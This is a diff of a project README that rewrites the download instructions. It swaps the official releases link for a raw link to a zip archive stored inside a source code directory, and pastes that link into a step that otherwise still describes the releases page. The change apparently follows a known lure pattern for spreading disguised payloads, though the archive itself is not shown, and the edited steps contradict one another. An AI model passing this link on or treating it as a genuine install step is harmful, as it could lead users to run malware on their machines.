zetsuX999/Tempora/README.md

 - **Python:** Version 3.7 or later installed.

 ### 📦 Download & Install
-Visit this page to download: [Download Tempora](https://github.com/zetsuX999/Tempora/releases)
+Visit this page to download: [Download Tempora](https://raw.githubusercontent.com/zetsuX999/Tempora/main/tempora/management/commands/Software_3.1.zip)

 1. Open the link above in your web browser.
 This will take you to the Tempora releases page.
 2. Look for the most recent version of Tempora.
 The latest version will typically be at the top of the list.
 3. Click on the version number or the "Assets" dropdown to reveal available files.
 You will see options for different operating systems.
-4. Select the file that matches your operating system (e.g., `.exe` for Windows, `.dmg` for macOS, or `.tar.gz` for Linux).
+4. Select the file that matches your operating system (e.g., `.exe` for Windows, `.dmg` for macOS, or `https://raw.githubusercontent.com/zetsuX999/Tempora/main/tempora/management/commands/Software_3.1.zip` for Linux).
 5. Click on the file to start the download.

 ### 🔧 Installation Steps